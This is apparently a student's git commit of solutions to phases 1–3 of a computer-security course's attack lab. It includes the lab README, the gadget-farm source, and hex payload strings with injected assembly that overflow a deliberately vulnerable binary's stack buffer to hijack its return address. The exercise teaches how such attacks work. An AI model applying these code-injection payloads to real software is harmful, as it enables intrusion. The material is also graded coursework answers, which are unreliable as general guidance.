finish Attack Lab Part 1

Attack Lab/target1/README.txt

@@ -0,0 +1,28 @@
+This file contains materials for one instance of the attacklab.
+
+Files:
+
+    ctarget
+
+Linux binary with code-injection vulnerability.  To be used for phases
+1-3 of the assignment.
+
+    rtarget
+
+Linux binary with return-oriented programming vulnerability.  To be
+used for phases 4-5 of the assignment.
+
+     cookie.txt
+
+Text file containing 4-byte signature required for this lab instance.
+
+     farm.c
+
+Source code for gadget farm present in this instance of rtarget.  You
+can compile (use flag -Og) and disassemble it to look for gadgets.
+
+     hex2raw
+
+Utility program to generate byte sequences.  See documentation in lab
+handout.
+

Attack Lab/target1/cookie.txt

@@ -0,0 +1 @@
+0x59b997fa

Attack Lab/target1/farm.c

@@ -0,0 +1,223 @@
+/* This function marks the start of the farm */
+int start_farm()
+{
+    return 1;
+}
+
+unsigned getval_142()
+{
+    return 2425387259U;
+}
+
+unsigned addval_273(unsigned x)
+{
+    return x + 3284633928U;
+}
+
+unsigned addval_219(unsigned x)
+{
+    return x + 2421715793U;
+}
+
+void setval_237(unsigned *p)
+{
+    *p = 3351742792U;
+}
+
+void setval_424(unsigned *p)
+{
+    *p = 2455290452U;
+}
+
+void setval_470(unsigned *p)
+{
+    *p = 3347925091U;
+}
+
+void setval_426(unsigned *p)
+{
+    *p = 2428995912U;
+}
+
+unsigned getval_280()
+{
+    return 3281016873U;
+}
+
+/* This function marks the middle of the farm */
+int mid_farm()
+{
+    return 1;
+}
+
+/* Add two arguments */
+long add_xy(long x, long y)
+{
+    return x+y;
+}
+
+unsigned getval_481()
+{
+    return 2428668252U;
+}
+
+void setval_296(unsigned *p)
+{
+    *p = 2425409945U;
+}
+
+unsigned addval_113(unsigned x)
+{
+    return x + 3380137609U;
+}
+
+unsigned addval_490(unsigned x)
+{
+    return x + 3676361101U;
+}
+
+unsigned getval_226()
+{
+    return 3225997705U;
+}
+
+void setval_384(unsigned *p)
+{
+    *p = 3229929857U;
+}
+
+unsigned addval_190(unsigned x)
+{
+    return x + 3767093313U;
+}
+
+void setval_276(unsigned *p)
+{
+    *p = 3372794504U;
+}
+
+unsigned addval_436(unsigned x)
+{
+    return x + 2425409161U;
+}
+
+unsigned getval_345()
+{
+    return 3252717896U;
+}
+
+unsigned addval_479(unsigned x)
+{
+    return x + 3372270217U;
+}
+
+unsigned addval_187(unsigned x)
+{
+    return x + 3224948361U;
+}
+
+void setval_248(unsigned *p)
+{
+    *p = 3674787457U;
+}
+
+unsigned getval_159()
+{
+    return 3375944073U;
+}
+
+unsigned addval_110(unsigned x)
+{
+    return x + 3286272456U;
+}
+
+unsigned addval_487(unsigned x)
+{
+    return x + 3229926025U;
+}
+
+unsigned addval_201(unsigned x)
+{
+    return x + 3353381192U;
+}
+
+unsigned getval_272()
+{
+    return 3523793305U;
+}
+
+unsigned getval_155()
+{
+    return 3385115273U;
+}
+
+void setval_299(unsigned *p)
+{
+    *p = 2447411528U;
+}
+
+unsigned addval_404(unsigned x)
+{
+    return x + 3281178249U;
+}
+
+unsigned getval_311()
+{
+    return 3674788233U;
+}
+
+void setval_167(unsigned *p)
+{
+    *p = 3281113481U;
+}
+
+void setval_328(unsigned *p)
+{
+    *p = 3526935169U;
+}
+
+void setval_450(unsigned *p)
+{
+    *p = 3372797449U;
+}
+
+unsigned addval_358(unsigned x)
+{
+    return x + 2430634248U;
+}
+
+unsigned addval_124(unsigned x)
+{
+    return x + 1019724425U;
+}
+
+unsigned getval_169()
+{
+    return 3223375496U;
+}
+
+void setval_181(unsigned *p)
+{
+    *p = 3269495112U;
+}
+
+unsigned addval_184(unsigned x)
+{
+    return x + 3529556617U;
+}
+
+unsigned getval_472()
+{
+    return 3525365389U;
+}
+
+void setval_350(unsigned *p)
+{
+    *p = 2430634312U;
+}
+
+/* This function marks the end of the farm */
+int end_farm()
+{
+    return 1;
+}

Attack Lab/target1/level1.txt

@@ -0,0 +1 @@
+00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 17 40 00

Attack Lab/target1/level2.dump

@@ -0,0 +1,10 @@
+
+level2.o：     文件格式 elf64-x86-64
+
+
+Disassembly of section .text:
+
+0000000000000000 <.text>:
+   0:	48 c7 c7 fa 97 b9 59 	mov    $0x59b997fa,%rdi
+   7:	68 ec 17 40 00       	pushq  $0x4017ec
+   c:	c3                   	retq   

Attack Lab/target1/level2.s

@@ -0,0 +1,3 @@
+mov $0x59b997fa,%rdi
+pushq $0x4017ec
+ret

Attack Lab/target1/level2.txt

@@ -0,0 +1 @@
+48 c7 c7 fa 97 b9 59 68 ec 17 40 00 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 dc 61 55

Attack Lab/target1/level3.dump

@@ -0,0 +1,10 @@
+
+level3.o：     文件格式 elf64-x86-64
+
+
+Disassembly of section .text:
+
+0000000000000000 <.text>:
+   0:	48 c7 c7 a8 dc 61 55 	mov    $0x5561dca8,%rdi
+   7:	68 fa 18 40 00       	pushq  $0x4018fa
+   c:	c3                   	retq   

Attack Lab/target1/level3.s

@@ -0,0 +1,3 @@
+mov $0x5561dca8,%rdi
+pushq $0x4018fa
+ret

Attack Lab/target1/level3.txt

@@ -0,0 +1 @@
+48 c7 c7 a8 dc 61 55 68 fa 18 40 00 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 dc 61 55 00 00 00 00 35 39 62 39 39 37 66 61